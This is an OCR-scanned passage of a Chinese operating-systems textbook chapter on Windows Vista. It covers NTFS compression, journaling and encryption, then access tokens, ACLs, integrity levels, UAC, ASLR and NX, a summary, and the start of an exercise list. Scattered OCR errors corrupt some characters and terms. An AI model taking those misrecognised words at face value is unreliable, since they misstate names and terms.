地 址 是 0， 表 明 它 是 16 个 被 压缩 的 块 的 最 后 部 分 。 为 了 避免 混淆 ， 磁 盘 第 0 块 不 用 于 存储 数据 。 同 时 ， 因 
为 卷 上 的 第 0 块 包 含 了 引导 扇 区 ， 用 它 来 存储 数据 也 是 不 可 能 的 。 

随机 访问 压缩 文件 也 是 可 行 的 ， 但 是 需要 技巧 。 假 设 一 个 进程 寻找 图 !1-46 中 文件 的 第 35 块 ，NTFS 
是 如 何 定位 一 个 压缩 文件 的 第 35 块 区 的 呢 ? 答案 是 NTFS 必 须 首先 读 取 并 且 解 压 整个 行 串 ， 获 得 第 35 块 
的 位 置 ， 之 后 就 可 以 将 该 块 传 给 读 取 它 的 进程 。 选 择 16 个 块 作为 压缩 单元 是 一 个 折 圳 的 结果 ， 短 了 会 影 
响 压 缩 效 率 ， 长 了 则 会 使 随机 访问 开销 过 大 。 

4, 日志 

NTFS 支 持 两 种 让 程序 探测 卷 上 文件 和 目录 变化 的 机 制 。 第 一 种 机 制 是 调用 名 为 NINotifyChange 
Directory File 的 IO 操作 , 传递 一 个 缓冲 区 给 系统 ， 当 系统 探测 到 目录 或 者 子 目 录 树 变化 时 ， 该 操作 返回 。 
这 个 MO 操作 的 结果 是 在 缓冲 区 里 填 上 变化 记录 的 一 个 列表 。 缓 冲 区 应 该 足够 大 ， 否 则 填 不 下 的 记录 会 
HER, 

第 二 种 机 制 是 NTFS 变 化 日 志 。NTFS 将 卷 上 的 目录 和 文件 的 变化 记录 保存 到 一 个 特殊 文件 中 ， 程 序 
可 以 使 用 特殊 文件 系统 控制 操作 来 读 取 ， 即 调用 API NtFsControlFile 并 以 FSCTL_ QUERY_USN_ 
JOURNAL 为 参数 。 日 志文 件 通常 很 大 ， 而 且 日 志 中 的 项 在 被 检查 之 前 重用 的 可 能 性 非常 小 。 

5. 文件 加 密 

如 今 ， 计 算 机 用 来 存储 很 多 敏感 数据 ， 包 括 公司 收购 计划 、 税 务 信息 、 情 书 ， 数 据 的 所 有 者 不 想 把 
这 些 信息 暴露 给 任何 人 。 但 是 信息 的 泄漏 是 有 可 能 发 生 的， 例如 笔记 本 电脑 的 丢失 或 失窃 ， 使 用 MS- 
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DOS 软 盘 重 起 桌面 系统 来 绕 过 Windows 的 安全 保护 ， 或 者 将 硬盘 从 计算 机 里 移 到 另 一 台 安装 了 不 安全 操 
作 系 统 的 计算 机 中 。 

Windows 提 供 了 加 密 文件 的 选项 来 解决 这 些 问题 ， 因 此 当 电脑 的 失窃 或 用 MS-DOS 重 启 时 ， 文 件 内 
容 是 不 可 读 的 。Windows 加 密 的 通常 方式 是 将 重要 目录 标识 为 加 密 的 ， 然 后 目录 里 的 所 有 文件 都 会 被 加 
密 ， 新 创建 或 移动 到 这 些 目 录 来 的 文件 也 会 被 加 密 。 加 密 和 解密 不 是 NTFS 自 己 管理 的 ， 而 是 由 EFS 
(Encryption File System) 驱动 程序 来 管理 ，EFS 作 为 回调 向 NTFS 注 册 。 

EFS 为 特殊 文件 和 目录 提供 加 密 。 在 Windows Vista 中 还 有 另外 一 个 叫做 BitLocker 的 加 密 工具 ， 它 
加 密 了 卷 上 几乎 所 有 的 数据 。 只 要 用 户 使 用 强 密 钥 来 发 挥 这 种 机 制 的 优势 ， 任 何 情况 下 它 都 能 帮助 用 户 
保护 数据 。 考 虑 到 系统 丢失 或 失窃 的 数量 ,以 及 身份 泄露 的 强烈 敏感 性 ， 确 保 机 密 被 保护 是 非常 重要 的 。 
每 天 都 有 惊人 数量 的 笔记 本 电脑 丢失 ， 仅 考虑 纽约 市 ， 华 尔 街 大 部 分 公司 平均 一 周 在 出 租车 上 丢失 一 台 
笔记 本 电脑 。 

11.9 Windows Vista 中 的 安全 

看 过 加 密 后 ， 该 从 总 体 上 探讨 安全 问题 了 。NT 的 最 初 设计 符合 美国 国防 部 C2 级 安全 需求 (DoD 
5200.28-STD) ， 该 郴 皮 书 是 安全 的 DoD 系 统 必需 满足 的 标准 。 此 标准 要 求 操作 系统 必需 具备 某 些 特性 才 
能 认定 对 特定 类 型 的 军事 工作 是 足够 安全 的 。 虽 然 Windows Vista 并 不 是 专 为 满足 C2 兼容 性 而 设计 的 ， 
但 它 从 最 初 的 NT 安全 设计 中 继承 了 很 多 安全 特性 ， 包 括 下 面 的 几 个 ， 

具有 有 反 欺骗 措施 的 安全 登录 。 

2) 自主 访问 控制 。 

3) 特权 化 访问 控制 。 

4) 对 每 个 进程 的 地 址 空间 保护 。 

5) 新 页 被 映射 前 必需 清空 。 

6) 安全 审计 。 

让 我 们 来 简要 地 回顾 一 下 这 些 条 目 。 

安全 登录 意味 着 系统 管理 员 可 以 要 求 所 有 用 户 必需 拥有 密码 才 可 以 登录 。 欺 骗 是 指 一 个 恶意 用 户 编 
写 了 一 个 在 屏幕 上 显示 登录 提示 的 程序 然后 走 开 以 期 望 一 个 无 素 的 用 户 会 坐 下 来 并 输入 用 户 名 和 密码 。 
用 户 名 和 密码 被 写 到 磁盘 中 并 且 用 户 被 告知 登陆 失败 。 Windows Vista 通 过 指示 用 户 按 下 CTRL-ALT- 
DEL 登录 来 避免 这 样 的 攻击 。 键 盘 驱动 总 是 可 以 捕获 这 个 键 序列 ， 并 随后 调用 一 个 系统 程序 来 显示 真正 
的 登录 屏幕 。 这 个 过 程 可 以 起 作用 是 因为 用 户 进程 无 法 禁止 键盘 驱动 对 CTRL-ALT-DEL 的 处 理 。 但 是 
NT 可 以 并 且 确 实在 某 些 情况 下 禁用 了 CTRL-ALT-DEL 安 全 警告 序列 。 这 种 想法 来 自 于 Windows XP 和 
Windows 2000， 用 来 使 NT 系统 对 从 Windows 98 切 换 过 来 的 用 户 保持 更 多 的 兼容 性 。 

自主 访问 控制 允许 文件 或 者 其 他 对 象 的 所 有 者 指定 谁 能 以 何 种 方式 使 用 它 。 特 权 化 访问 控制 允许 系 
统管 理 员 (超级 用 户 ) 随 需 覆盖 上 述 权限 设 定 。 地 址 空间 保护 仅仅 意味 着 每 个 进程 自己 的 受 保护 的 虚拟 
地 址 空间 不 能 被 其 他 未 授权 的 进程 访问 。 下 一 个 条 目 意味 着 当 进程 的 堆 增长 时 被 映射 进来 的 页 面 被 初始 
化 为 零 ， 这 样 它 就 找 不 到 页 面 以 前 的 所 有 者 所 存放 的 旧 信 息 (参见 在 图 11-36 中 为 此 目的 而 提供 的 清 零 
页 的 列表 )。 最 后 ， 安 全 审计 使 得 管理 员 可 以 获取 某 些 安全 相关 事件 的 日 志 。 

郴 皮 书 没有 指定 当 笔记 本 电脑 被 盗 时 将 发 生 什么 事情 ， 然 而 在 一 个 大 型 组 织 中 每 星期 发 生 一 起 盗 窗 
是 很 常见 的 。 于 是 ，Windows Vista 提 供 了 一 些 工具 ， 当 笔记 本 被 次 或 者 丢失 时 ， 谨 慎 的 用 户 可 以 利用 它 
们 最 小 化 损失 。 当 然 ， 痢 慎 的 用 户 正 是 那些 不 会 丢失 笔记 本 的 人 一 一 这 种 麻烦 是 其 他 人 引起 的 。 

下 一 章 将 描述 在 Windows Vista 中 基本 的 安全 概念 ， 以 及 关于 安全 的 系统 调用 。 最 后 ， 我 们 将 看 看 
安全 是 怎样 实现 的 。 

11.9.1 基本 概念 

每 个 Windows Vista 用 户 (和 组 ) 用 一 个 SID (Security ID， 安 全 ID) 来 标识 。SID 是 二 进 制 数字 ， 
由 一 个 短 的 头 部 后 面 接 一 个 长 的 随机 部 分 构成 。 每 个 SID 都 是 世界 范围 内 唯一 的 。 当 用 户 启动 进程 时 ， 
进程 和 它 的 线程 带 有 该 用 户 的 SID 运 行 。 安 全 系统 中 的 大 部 分 地 方 被 设计 为 确保 只 有 带 有 授权 SID 的 线 
程 才 可 以 访问 对 象 。 
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每 个 进程 拥有 一 个 指定 了 SID 和 其 他 属性 的 访问 令 牌 。 该 令 牌 通常 由 winlogon 创 建 ， 就 像 后面 说 的 
那样 。 图 11-47 展 示 了 令 牌 的 格式 。 进 程 可 以 调用 GetTokenlnformation 来 获取 令 牌 信息 。 令 牌 的 头 部 包 
含 了 一 些 管理 性 的 信息 。 过 期 时 间 字 段 表示 令 牌 何 时 不 再 有 效 ， 但 当前 并 没有 使 用 该 字段 。 组 字段 指定 
了 进程 所 隶属 的 组 。POSIX 子 系统 需要 该 字段 。 默 认 的 DACL (Discretionary Access Control List， 自 主 
访问 榨 制 列表 ) 会 赋 给 被 进程 创建 的 对 象 ， 如 果 没 有 指定 其 他 ACL 的 话 。 用 户 的 SID 表 示 进 程 的 拥有 者 。 
受 限 SID 使 得 不 可 信 的 进程 以 较 少 的 权限 参与 到 可 信 进 程 的 工作 中 ， 以 免 造 成 破坏 。 

最 后 ， 权 限 字段 ， 如 果 有 的 话 ， 赋 予 进程 除 普通 用 户外 特殊 的 权利 ， 比 如 关机 和 访问 本 来 无 权 访问 
的 文件 的 权利 。 实 际 上 ， 权 限 域 将 超级 用 户 的 权限 分 成 几 种 可 独立 赋予 进程 的 权限 。 这 样 ， 用 户 可 被 赋 
予 一 些 超级 用 户 的 权限 ， 但 不 是 全 部 的 权限 。 总 之 ,访问 令 牌 表示 了 谁 拥有 这 个 进程 和 与 其 关联 的 权限 
及 默认 值 。 


头 部 | 过 期 时 间 | 组 | 默认 DACL | 用 户 SID | 组 SID | 受 限 SID | 权限 | 身份 模拟 级 别 | 完整 度 级 别 


图 11-47 访问 令 牌 结构 


当 用 户 登录 时 ， winlogon 赋 予 初始 的 进程 一 个 访问 令 牌 。 后 续 的 进程 一 般 会 将 这 个 令 牌 继承 下 去 。 
初始 时 ， 进 程 的 访问 令 牌 会 被 赋予 其 所 有 的 线程 。 然 而 ， 线 程 在 运行 过 程 中 可 以 获得 一 个 不 同 的 令 牌 ， 
在 这 种 情况 下 ， 线 程 的 访问 令 牌 覆盖 了 进程 的 访问 令 牌 。 特 别 地 ， 一 个 客户 端 线 程 可 以 将 访问 权限 传递 
给 服务 器 线程 ， 从 而 使 得 服务 器 可 以 访问 客户 端的 受 保护 的 文件 和 其 他 对 象 。 这 种 机 制 叫做 身份 模拟 
(impersonation) 。 它 是 由 传输 层 〈 比 如 ALPC、 命 名 管道 和 TCP/IP) 实现 的 、 被 RPC 用 来 实现 从 客户 端 
到 服务 器 的 通信 。 传 输 层 使 用 内 核 中 安全 引用 监控 器 组 件 的 内 部 接口 提取 出 当前 线程 访问 令 牌 的 安全 上 
下 文 ， 并 把 它 传送 到 服务 器 端 来 构建 用 于 服务 器 模拟 客户 身份 的 令 牌 。 

另 一 个 基本 的 概念 是 安全 描述 符 (security descriptor)。 每 个 对 象 都 关联 着 一 个 安全 描述 符 ， 该 描 
述 符 描述 了 谁 可 以 对 对 象 执行 何 种 操作 。 安 全 描述 符 在 对 象 被 创建 的 时 候 指 定 。NTFS 文 件 系统 和 注册 
表 维 护 着 安全 描述 符 的 持久 化 形式 ， 用 以 为 文件 和 键 对 象 【对象 管理 器 中 表示 已 打开 的 文件 和 刍 的 实例 ) 
创建 安全 描述 符 。 

安全 描述 由 一 个 头 部 和 其 后 带 有 一 个 或 多 个 访问 控制 入 口 (Access Control Entry, ACE) 的 DACL 组 
成 。ACE 主 要 有 两 类 : 允许 项 和 拒绝 项 。 允 许 项 含有 一 个 SID 和 一 个 表示 带 有 此 SID 的 进程 可 以 执行 哪些 
操作 的 位 图 。 拒 绝 项 与 允许 项 相同 ， 不 过 其 位 图 表示 的 是 谁 不 可 以 执行 那些 操作 。 比 如 ，Ida 拥 有 一 个 文 
件 ， 其 安全 描述 符 指定 任何 人 都 可 读 ，Elvis 不 可 访问 ，Cathy 可 读 可 写 ， 并 且 Ida 自 己 拥有 完全 的 访问 权限 。 
图 11-48 描 述 了 这 个 简单 的 例子 。Everyone 这 个 SID 表 示 所 有 的 用 户 ， 但 该 表 项 会 被 任何 显 式 的 ACE 覆盖 。 


安全 描述 符 


图 11-48 文件 的 安全 描述 符 示例 


518 ГЕЗ 


除 DACL 外 ， 安 全 描述 符 还 包含 一 个 系统 访问 控制 列表 (System Access Control List, SACL), 
SACL 跟 DACL 很 相似 ， 不 过 它 表示 的 并 不 是 谁 可 以 使 用 对 象 ， 而 是 哪些 对 象 访问 操作 会 被 记录 在 系统 
范围 内 的 安全 事件 日 志 中 。 在 图 11-48 中 ，Marilyn 对 文件 执行 的 任何 操作 都 将 会 被 记录 。SACL 还 包含 完 
整 度 级 别 字段 ， 我 们 将 稍 后 讨论 它 。 

11.9.2 安全 相关 的 API 调 用 

Windows Vista 的 访问 控制 机 制 大 都 基于 安全 描述 符 。 通 常情 况 下 进程 创建 对 象 时 会 将 一 个 安全 描 
述 符 作为 参数 提供 给 CreateProcess、CreateFile 或 者 其 他 对 象 创建 调用 。 该 安全 描述 符 就 会 附属 在 这 
个 对 象 上 ， 就 如 在 图 11-48 中 看 到 的 那样 。 如 果 没 有 给 创建 对 象 的 函数 调用 提供 安全 描述 符 ， 调 用 者 的 
访问 令 牌 中 默认 的 安全 设置 (参见 图 11-47) 将 被 使 用 。 

大 部 分 Win32 API 安 全 调用 跟 安 全 描述 符 的 管理 相关 ， 因 此 在 这 里 主要 关注 它们 。 图 11-49 列 出 了 那 
些 最 重要 的 调用 。 为 了 创建 安全 描述 符 ， 首 先 要 分 配 存储 空间 ， 然 后 调用 Initialize Security Descriptor 
初始 化 它 。 该 调用 填充 了 安全 描述 符 的 头 部 。 如 果 不 知道 所 有 者 的 SID ， 可 以 根据 名 字 用 
LookupAccountSid 来 查询 。 随 后 SID 被 插入 到 安全 描述 符 中 。 对 组 SID 也 一 样 ， 如 果 有 的 话 。 通 常 ， 这 
些 SID 会 是 调用 者 自己 的 SID 和 它 的 某 一 个 组 SID， 不 过 系统 管理 员 可 以 填充 任何 SID。 


Win32 АРІ 函数 Ж ж 
InitializeSecurityDescriptor | 淮 备 一 个 新 的 安全 描述 符 
LookupAccountSid 查询 指定 用 户 名 的 SID 


SetSecurityDescriptorOwner | 设置 安全 摘 述 符 中 的 所 有 者 的 SID 
SetSecurityDescriptorGroup | 设置 安全 描述 符 中 的 组 SID 
InitializeAcl ”| 初始 化 DACL 或 者 SACL 

| AddAccessAllowedAce | 向 DACL 或 者 SACL 添 加 一 个 允许 访问 的 新 ACE 
| AddAccessDeniedAce 向 DACL 或 者 SACL 添 加 -个 拒绝 访问 的 新 ACE 
DeleteAce 从 DACL 或 者 SACL 删 除 ACE 
SetSecurityDescriptorDacl | 使 DACL 依 附 到 一 个 安全 描述 符 


图 11-49 Win32 中 基本 的 安全 调用 


这 时 可 调用 InitializeAcl 初 始 化 安全 描述 符 的 DACL (或 者 SACL)。ACL 入 口 项 可 通过 AddAccess 
AllowedAce 和 AddAccessDeniedAce。 可 多 次 调用 这 些 函 数 以 添加 任何 所 需 的 ACE 人 口 项 。 可 调用 
DeleteAce 来 删除 一 个 人 口 项 ， 这 用 来 修改 已 存在 的 ACL 而 不 是 构建 一 个 新 的 ACL。SetSecurity 
DescriptorDacl 可 以 把 一 个 准备 就 结 的 ACL 与 安全 描述 符 关联 到 一 起 。 最 后 ， 当 创建 对 象 时 ， 可 将 新 构 
造 的 安全 描述 符 作为 参数 传送 使 其 与 这 个 对 象 相 关联 。 


11.9.3 安全 性 的 实现 

在 独立 的 Windows Vista 系 统 中 ， 安 全 由 大 量 的 组 件 来 实现 ， 我 们 已 经 看 过 了 其 中 大 部 分 组 件 (网 络 
是 完全 不 同 的 事情 ， 超 出 了 本 书 的 讨论 范围 )。 登 录 和 认证 分 别 由 winlogon 和 lsass 来 处 理 。 登 录 成 功 后 会 
获得 一 个 带 有 访问 令 牌 的 GUI shell 程 序 (explorerexe)。 这 个 进程 使 用 注册 表 中 的 SECURITY 和 SAM 表 
项 。 前 者 设置 一 般 性 的 安全 策略 ， 而 后 者 包含 了 针对 个 别 用 户 的 安全 信息 ， 如 11.2.3 节 讨论 的 那样 。 

一 旦 用 户 登录 成 功 ， 每 当 打开 对 象 进行 访问 就 会 触发 安全 操作 。 每 次 OpenXXX 调 用 都 需 提供 正 要 
被 打开 的 对 象 的 名 字 和 所 需 的 权限 集合 。 在 打开 的 过 程 中 ， 安 全 引用 监控 器 会 检查 调用 者 是 否 拥有 所 需 
的 权限 。 它 通过 检查 调用 者 的 访问 令 牌 和 跟 对 象 关 联 的 DACL 来 执行 这 种 检查 。 安 全 监控 管理 器 依次 检 
查 ACL 中 的 每 个 ACE。 一 旦 发 现 人 口 项 与 调用 者 的 SID 或 者 调用 者 所 隶属 的 某 个 组 相 匹配 ， 访 问 权限 即 
可 确定 。 如 果 调 用 者 拥有 所 需 的 权限 ， 则 打开 成 功 ， 否 则 打开 失败 。 

正如 已 经 看 到 的 那样 ， 除 允许 项 外 ，DACL 还 包括 拒绝 项 。 因 此 ， 通 常 把 ACL 中 的 拒绝 访问 的 项 置 
于 赋予 访问 权限 的 项 之 面 ， 这 样 一 个 被 特意 拒绝 访问 的 用 户 不 能 通过 作为 拥有 合法 访问 权限 的 组 的 成 员 
这 样 的 后 门 获 得 访问 权 。 
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对 象 被 打开 后 ， 调 用 者 会 获得 一 个 句柄 。 在 后 续 的 调用 中 ， 只 需 检查 尝试 的 操作 是 否 在 打开 时 所 申 
请 的 操作 集合 内 ， 这 样 就 避免 了 调用 者 为 了 读 而 打开 文件 然后 对 该 文件 进行 写 操作 。 另 外 ， 正 如 SACL 
所 要 求 的 那样 ， 在 句柄 上 进行 的 调用 可 能 会 导致 产生 审计 日 志 。 

Windows Vista 增 加 了 另外 的 安全 设施 来 应 对 使 用 ACL 保 护 系统 的 共同 问题 。 进 程 的 令 牌 中 含有 新 
增加 的 必需 的 完整 性 级 别 (Integrity-Level) SID 字 段 并 且 对 象 在 SACL 中 指定 了 一 个 完整 性 级 别 ACE。 
完整 性 级 别 阻止 了 对 对 象 的 写 访 问 ， 不 管 DACL 中 有 何 种 ACE。 特 别 地 ， 完 整 性 级 别 方案 用 来 保护 系统 
免 受 被 攻击 者 控制 的 Internet Explorer 进 程 (可 能 用 户 接受 了 不 妥 的 建议 而 从 未 知 的 网 站 下 载 代码 ) 的 破 
坏 。 低 权限 的 正 ， 运 行 时 的 完整 性 级 别 被 设置 为 低 。 系 统 中 所 有 的 文件 和 注册 表 中 的 键 拥有 中 级 的 完整 
性 级 别 ， 因 此 低 完整 性 级 别 的 IE 不 能 修改 它们 。 

近年 来 Windows 增 加 了 很 多 其 他 的 安全 特性 。 对 于 Windows XP Service Pack 2 来 说 ， 系 统 的 大 部 分 
在 编译 时 使 用 了 可 对 多 种 栈 缓冲 区 溢出 漏洞 进行 验证 的 选项 (/GS)。 另 外 ， 在 AMD64 体 系 结构 中 一 种 
叫做 NX 的 设施 可 限制 执行 栈 上 的 代码 。 即 使 在 x86 模 式 下 处 理 器 中 的 NX 位 也 是 可 用 的 。 NX 代表 不 可 执 
17 (по ехесше), ， 它 可 以 给 页 面 加 上 标记 使 得 其 上 的 代码 不 能 被 执行 。 这 样 ， 即 使 攻击 者 利用 缓冲 区 溢 
出 漏洞 向 进程 插入 代码 ， 跳 转 到 代码 处 开始 执行 也 不 是 一 件 容易 的 事情 。 

Windows Vista 引 和 人 了 更 多 的 安全 特性 来 阻止 攻击 者 。 加 载 到 内 核 态 的 代码 要 经 过 检查 (这 在 x64 系 
统 中 是 默认 的 ) 并 且 只 有 被 正确 签名 的 代码 才 可 以 被 加 载 。 在 每 个 系统 中 ， DLL 和 EXE 的 加 载 地 址 连同 
栈 分 配 的 地 址 都 经 过 了 有 意 的 混 排 ， 这 使 得 攻击 者 不 太 可 能 利用 缓冲 区 溢出 漏洞 跳 转 到 一 个 众所周知 的 
地 址 然后 执行 一 段 被 特意 编排 的 可 获得 权限 提升 的 代码 。 会 有 更 小 比例 的 系统 受到 依赖 于 标准 地 址 处 的 
二 进 制 数据 的 攻击 。 在 受到 攻击 时 系统 更 加 可 能 只 是 崩溃 掉 ， 将 一 个 潜在 的 权限 升级 攻击 转化 为 危险 性 
更 小 的 拒绝 服务 攻击 。 

在 微软 公司 称 为 用 户 账户 控制 (User Account Control, UAC) 的 引入 是 另 一 个 改变 。 这 用 来 解决 大 
部 分 用 户 以 管理 员 身 份 运行 系统 这 个 长 期 的 问题 。 Windows 的 设计 并 不 需要 用 户 以 管理 员 身份 使 用 系统 ， 
但 在 很 多 发 布 版 本 中 对 此 问题 的 忽视 使 得 如 果 你 不 是 管理 员 就 不 可 能 顺利 地 使 用 Windows。 始终 以 管理 员 
身份 使 用 系统 是 危险 的 。 用 户 的 错误 会 轻易 地 毁坏 系统 ， 而 且 如 果 用 户 由 于 某 种 原因 被 欺骗 或 攻击 了 而 
去 运行 可 能 危害 系统 的 代码 ， 这 些 代码 将 拥有 管理 员 的 访问 权限 并 且 可 能 会 把 其 自 身 深 深 埋藏 在 系统 中 。 

如 果 有 UAC， 当 尝试 执行 需要 管理 员 访问 权限 的 操作 时 ， 系统 会 显示 一 个 重合 的 特殊 桌面 并 且 接管 
控制 权 ， 使 得 只 有 用 户 的 输入 可 以 授权 这 次 访问 (与 C2 安 全 中 CTRL-ALTDEL 的 工作 方式 类 似 )。 当 然 ， 
攻击 者 不 需要 成 为 管理 员 也 可 以 破坏 用 户 所 真正 关心 的 ， 比 如 他 的 个 人 文件 。 但 UAC 确 实 可 阻止 现 有 类 
型 的 攻击 ， 并 且 如 果 攻 击 者 不 能 修改 任何 系统 数据 或 文件 ， 那 受 损 的 系统 恢复 起 来 也 比 容易 。 

Windows Vista 中 最 后 的 一 个 安全 特性 已 经 提 到 过 了 。 这 就 是 对 具有 安全 边界 的 受 保护 进程 
(protected process) 的 支持 。 通 常 ， 在 系统 中 用 户 (由 令 牌 对 象 代表 ) 定义 了 权限 的 边界 。 创 建 进程 后 ， 
用 户 可 通过 任意 数目 的 内 核 设施 来 访问 进程 以 进行 进程 创建 、 调 试 、 获取 路 径 名 和 线程 注入 等 。 受 保护 
进程 关 掉 了 用 户 的 访问 权限 。 这 个 设施 在 Vista 中 的 唯一 用 处 就 是 允许 数字 版 权 管理 软件 更 好 地 保护 内 容 。 
对 受 保护 进程 的 使 用 在 未 来 的 发 布 版 本 中 可 能 会 用 于 对 用 户 更 加 友好 的 目的 ， 比方 说 保护 系统 以 应 对 攻 
击 者 而 不 是 保护 内 容 免 受 系统 所 有 者 的 攻击 。 

由 于 世界 范围 内 越 来 越 多 的 针对 Windows 系 统 的 攻击 ， 近年 来 微软 公司 加 大 了 提高 Windows 安 全 性 
的 努力 。 其 中 某 些 攻击 非常 成 功 ， 使 得 整个 国家 和 主要 公司 的 计算 机 都 宕 掩 了， 导致 了 数 十 亿美 元 的 损 
失 。 这 些 攻击 大 都 利用 了 编码 中 的 小 错误 ， 这 些 错误 可 导致 缓冲 区 溢出 ， 从 而 使 得 攻击 者 可 以 通过 重 写 
返回 地 址 、 异 常 处 理 指针 和 其 他 数据 来 控制 程序 的 执行 。 使 用 类 型 安全 的 语言 而 不 是 C 和 C++ 可 各 免 许 
多 此 类 的 问题 。 即 使 使 用 这 些 不 安全 的 语言 ， 如 果 让 学 生 更 好 地 理解 参数 和 数据 验证 中 的 陷阱 ， 许 多 漏 
洞 也 可 以 避免 。 毕 况 ， 许多 在 Microsoft 编 写 代 码 的 软件 工程 师 在 几 年 前 也 还 是 学 生 ， 就 像 正 在 阅读 此 实 
例 研 究 的 你 们 中 的 许多 人 一 样 。 有 许多 关于 在 基于 指针 的 语言 中 可 被 利用 的 编码 上 的 小 错误 的 类 型 以 及 
怎样 避免 的 书籍 (比如 ，Howard 和 LeBlank，2007)。 


11.10 小 结 
Windows Vista 中 的 内 核 态 由 HAL、 NTOS 的 内 核 和 执行 体 层 以 及 大 量 实现 了 从 设备 服务 到 文件 系统 、 
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从 网 络 到 图 形 的 设备 驱动 程序 组 成 。HAL 对 其 他 组 件 隐藏 了 硬件 上 的 某 些 差别 。 内 核 层 管理 CPU 以 支持 
多 线程 和 同步 ， 执 行 体 实现 大 多 数 的 内 核 态 服务 。 

执行 体 基于 内 核 态 的 对 象 ， 这 些 对 象 代表 了 关键 的 执行 体 数据 结构 ， 包 括 进 程 、 线 程 、 内 存 区 、 驱 
动 程序 、 设 备 以 及 同步 对 象 等 。 用 户 进程 通过 调用 系统 服务 来 创建 对 象 并 获得 句柄 的 引用 以 用 于 后 续 对 
执行 体 组 件 的 调用 。 操 作 系统 也 创建 一 些 内 部 对 象 。 对 象 管理 器 维护 者 一 个 名 字 空 间 ， 对 象 可 以 插入 该 
名 字 空 间 以 备 后 续 的 查询 。 

Windows 系 统 中 最 重要 的 对 象 是 进程 、 线 程 和 内 存 区 。 进 程 拥有 虚拟 地 址 空间 并 且 是 资源 的 容器 。 
线程 是 执行 的 单元 并 被 内 核 层 使 用 优先 级 算法 调度 执行 ， 该 优先 级 算法 使 优先 级 最 高 的 就 绪 线程 总 在 运 
fi, 并 且 如 有 必要 可 抢占 低 优先 级 线程 。 内 存 区 表示 可 以 映射 到 进程 地 址 空间 的 像 文件 这 样 的 内 存 对 象 。 
EXE 和 DLL 等 程序 映像 用 内 存 区 来 表示 ， 就 像 共享 内 存 一 样 。 

Windows 支 持 按 需 分 页 虚拟 内 存 。 分 页 算法 基于 工作 集 的 概念 。 系 统 维护 着 几 种 类 型 的 页 面 列表 来 
优化 内 存 的 使 用 。 这 些 页 面 列表 是 通过 调整 工作 集 来 填充 的 ， 调 整 过 程 使 用 了 复杂 的 规则 试图 重用 在 长 
时 间 内 没有 被 引用 的 物理 页 面 。 缓 存 管理 器 管理 内 核 中 的 虚拟 地 址 并 用 它 将 文件 映射 到 内 存 ， 这 提高 了 
许多 应 用 程序 的 1/O 性 能 ， 因 为 读 操作 不 用 访问 磁盘 就 可 被 满足 。 

设备 驱动 程序 遵循 Windows 驱 动 程序 模型 ， 并 执行 输入 /输出 。 每 个 驱动 程序 开始 先 初始 化 一 个 驱动 
程序 对 象 ， 该 对 象 含有 可 被 系统 调用 以 操控 设备 的 过 程 的 地 址 。 实 际 的 设备 用 设备 对 象 来 代表 ， 设 备 对 
象 可 以 根据 系统 的 配置 描述 来 创建 ， 或 者 由 即 插 即 用 管理 器 按照 它 在 枚 举 系统 总 线 时 所 发 现 的 设备 创建 。 
设备 组 织 成 一 个 栈 ，1/O 请 求 包 沿 着 栈 向 下 传递 并 被 每 个 设备 的 驱动 程序 处 理 。1/O 具 有 内 在 的 异步 性 ， 驱 
动 程序 程序 通常 将 请 求 排队 以 便 后 续 处 理 然后 返回 到 调用 者 。 文 件 系统 卷 作为 1O 系 统 中 的 设备 实现 。 

NTFS 文 件 系统 基于 一 个 主 文件 表 ， 每 个 文件 或 者 目录 在 表 中 有 一 条 记录 。NTFS 文 件 系 统 的 所 有 元 
数据 本 身 是 NTFS 文 件 的 一 部 分 。 每 个 文件 含有 多 个 属性 ， 这 些 属性 或 存储 在 MFT 记 录 中 或 者 不 在 其 中 
(存储 在 MFT 外 部 的 块 中 ) 。 除 此 之 外 ，NTFS 还 支持 Unicode、 压 缩 、 日 志和 加 密 等 。 

最 后 ，Windows Vista 拥 有 一 个 基于 访问 控制 列表 和 完整 性 级 别 的 成 熟 的 安全 系统 。 每 个 进程 带 有 
一 个 令 牌 ， 此 令 牌 表 示 了 用 户 的 标识 和 进程 所 具有 的 特殊 权限 。 每 个 对 象 有 一 个 与 其 相关 联 的 安全 描述 
符 。 安 全 描述 符 指向 一 个 自主 访问 控制 列表 ， 该 列表 中 包含 允许 或 者 拒绝 个 体 或 者 组 访问 的 访问 控制 人 
口 项 ，Windows 在 最 近 的 发 行 版 本 中 增加 了 大 量 的 安全 特性 ， 包 括 用 BitLocker 来 加 密 整 个 卷 ， 采 用 地 址 


空间 随机 化 ， 不 可 执行 的 堆栈 以 及 其 他 措施 使 得 缓冲 区 溢出 攻击 更 加 困难 。 


习题 


1. HAL 可 以 跟踪 从 1601 年 开始 的 所 有 时 间 。 举 一 
个 例子 ， 说 明 这 项 功能 的 用 途 。 

2. 在 11.3.2 节 ， 我 们 介绍 了 在 多 线程 应 用 程序 中 一 
个 线程 关闭 了 句柄 而 另 一 个 线程 仍然 在 使 用 它 
们 所 造成 的 问题 。 解 决 此 问题 的 一 种 可 能 性 是 
插入 序列 域 。 请 问 该 方法 是 如 何 起 作用 的 ? 需 
要 对 系统 做 哪些 修改 ? 

3. Win32 系统 没有 信号 功能 。 如 果 要 引入 此 功能 ， 
我 们 可 以 将 信号 设置 为 进程 所 有 ， 线 程 所 有 ， 
两 者 都 有 或 者 两 者 都 没有 。 试 着 提出 一 项 建议 ， 
并 解释 为 什么 。 

4. 另 一 种 使 用 DLL 的 方式 是 静态 地 将 每 个 程序 链 
接 到 它 实际 调用 到 那些 库 函 数 ， 既 不 多 也 不 少 。 
在 客户 端 机 器 或 者 服务 器 机 器 上 引入 此 方法 ， 
哪个 更 合理 ? 

5. 在 Windows 中 线程 拥有 独立 的 用 户 态 栈 和 内 核 
态 栈 的 原因 是 哪些 ? 


6.TLB 对 性 能 有 重大 的 影响 。 为 了 提高 TLB 的 有 
效 性 ，Windows 使 用 了 大 小 为 4MB 的 页 ， 这 是 
什么 ? 

7. 在 一 个 执行 体 对象 上 可 定义 的 不 同 操作 的 数量 
有 没有 限制 ? 如 果 有 ， 这 个 限制 从 何 而 来 ?如 
果 没 有 ， 请 说 明 为 什么 。 

8. Win32 API[ 的 调用 WaitForMultipleObjects 以 一 
组 同步 对 象 的 句柄 为 参数 ， 使 得 线程 被 这 组 同 
步 对 象 阻塞 。 一 旦 它们 中 的 任何 一 个 收 到 信和 号， 
调用 者 线程 就 会 被 释放 。 这 组 同步 对 象 是 否 可 
以 包含 两 个 信号 灯 、 一 个 互 斥 体 和 一 个 临界 
区 ? 理由 是 什么 ? 提示 : 这 不 是 一 个 恶作剧 的 问 
